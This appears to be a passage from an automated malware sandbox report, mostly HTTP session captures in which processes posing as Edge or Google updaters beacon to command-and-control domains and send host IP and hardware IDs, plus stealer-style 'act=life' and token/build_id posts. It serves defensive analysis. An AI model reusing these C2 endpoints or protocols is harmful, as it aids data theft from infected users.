                                                                                                                                                                                                                                          2024-10-02 12:44:28 UTC16384INDELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count(*) FROM %Q.'%q_%s'tokencharsseparatorsL* N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED]
                                                                                                                                                                                                                                          r:Y<|=>MbP?|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED]
                                                                                                                                                                                                                                          i"
                                                                                                                                                                                                                                          i"$i"0i"8i"Di"Pi"\i"hi"
                                                                                                                                                                                                                                          xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"*n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED]
                                                                                                                                                                                                                                          9/I?hKd?81UH!G?#$0|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?*llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!*87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED]
                                                                                                                                                                                                                                          !5ACPRSWYlm pr

                                                                                                                                                                                                                                          )Y*"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          72192.168.2.658600104.21.56.150443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: abnomalrkmu.site
                                                                                                                                                                                                                                          2024-10-02 12:44:26 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:27 UTC766INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:27 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=nh62fslsnvsfpb8ddcre2jgjqj; expires=Sun, 26 Jan 2025 06:31:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjrAmliSwRAIXvcjhjhVt16ey0nkKrO5zB02szt%2FYttwrrcXR7VcHUmocMgv6%2FAzhbLTDW5A73E55dnTw7DjD0uFLIbr5Qy0b5N1%2BWaOAvOQZdPHMYm3qqVYiJgdoEgaaLQx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8ad0d010f75-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:27 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          73192.168.2.658601172.67.184.196443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:29 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: treatynreit.site
                                                                                                                                                                                                                                          2024-10-02 12:44:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:29 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:29 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=14ok2p6s9lifologbvaadb23d0; expires=Sun, 26 Jan 2025 06:31:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6vIA%2BSFn9OQt%2FdPPLdJZ19duJgaXGbzcjSPnhDWTQZBCMvoK798HOnng9iTeUms3dTLrQo%2BaiaJZgJb4sZgaWDeozrOeysKhvxm1v1xw2ObSY3tgofTs4rhCdS7M%2BGJk%2B0Zz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8bc9fd8de96-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:29 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          74192.168.2.65860249.12.197.94435316C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:29 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCA
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 829
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:29 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 62 34 38 37 63 38 33 65 33 63 64 64 37 64 38 65 39 35 65 38 34 35 39 35 38 65 33 62 61 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"cab487c83e3cdd7d8e95e845958e3ba4------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DHIEBAAKJDHIECAAFHCACont
                                                                                                                                                                                                                                          2024-10-02 12:44:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:30 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:30 UTC15INData Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 5block0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          75192.168.2.658604172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:30 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:30 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:30 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:44:31 UTC603INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:31 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vR7BHOhxY37ovTh9NLK6XJxEUPnd7QgTz5LyiYZnqfSYPzZSJVoFZ7YDg3PNahfMo8u8rkxw1mj1S8JOOXelVSXsvn%2BwU6ma6bBpzA6hhBXTwm2NAycgnUwCD2ywBvD2Rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8c3cddd1849-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          76192.168.2.658605104.21.18.193443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:30 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: snarlypagowo.site
                                                                                                                                                                                                                                          2024-10-02 12:44:30 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:31 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:31 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=4dgukdo390va706th21ve8m46m; expires=Sun, 26 Jan 2025 06:31:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=apSPNwfpabwtqppbr69QOEBS5DlZ4%2B8apJ6RGqGjfFoHwZYoo4rIe3S3DYUWiDQ5Tfm0C3yHZDE798swrLBd3ZZ8y09e3gFpXwk7SLtSE1rGwYD7tUKXpu8fskTgO0i5fvUfuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8c42bd54235-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:31 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          77192.168.2.658607172.67.195.67443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:31 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: mysterisop.site
                                                                                                                                                                                                                                          2024-10-02 12:44:31 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC764INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:32 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3v25l5k9rh7v3msd3p2jvvd0n0; expires=Sun, 26 Jan 2025 06:31:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jj7Zy7eRa6U9hNEwKwKoU8ZIiawrUswEi3aiLDo8cAOpOgp2oOiNhH6ke%2BSBHzABeujyGNV5Vm8jos1ZRDmr5UH2NHRRTXUWThGFkBO1kQybLYIRhsUJWakwOkSCRheBwTk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8ca29c9432c-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          78192.168.2.658609172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:32 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eUcuYZhGoG8dcFXaLTCmOS24xpVs%2F4IMxpe8igcxfBzfLMlaBSSLXXcFKl1YgGw%2BU%2B5AN5MuMZpubC5mjDwh%2B2z3C0R%2BLrn0jaqAfItLJuOnE%2FR0ZkYQ1DrHwGZ%2BL0%2BR2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8ccf8af41f3-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          79192.168.2.658610172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:32 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gdkxYos3QNPoRXMyelAk%2B5TfjH2DLp0wkpdpRntXfjevEM%2FsvSlBTRTdnZn4h3r1TOzutUpBpI6CBykWyHDOA4YeXCAHNWLinTJMFRGdRwQB9vi5itnsdXlax7g%2BrXAvNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8ceda87c47a-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          80192.168.2.658611104.21.17.174443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: absorptioniw.site
                                                                                                                                                                                                                                          2024-10-02 12:44:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:44:33 UTC782INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:33 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=et9ujbqf55aga290b8s4jhs01v; expires=Sun, 26 Jan 2025 06:31:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zWAKKf1ZyrEYSwfbbtNDw7tpJRlFpi%2FKWm%2Fwmij%2FIpL4wt%2BcQTTwW%2B%2FwMWKU065lKYMhQoRsu6TuNAmWxKcz%2BiRPziwo16faf392Q1X2aBeuxwpcTEhOwnrq3Aa5mhmkedoYfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8d06dab8cb3-EWR
                                                                                                                                                                                                                                          2024-10-02 12:44:33 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:44:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          81192.168.2.658612172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:33 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:33 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:33 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:44:33 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:33 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G1HMvspsaAR%2FClREXtvf1aHAkbc85rX886%2FJjuh5LeXyv2fqU4Y1U18g6lpSRoqOv1Hm8qm9xjMceDLiOQT3mdcakrEsOkU%2FTjMezYc8n5EpcUjezOFdMfkCeIJAY0gdaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8d42c8f8c8f-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          82192.168.2.658614172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:33 UTC144OUTPOST /get_file.php HTTP/1.1
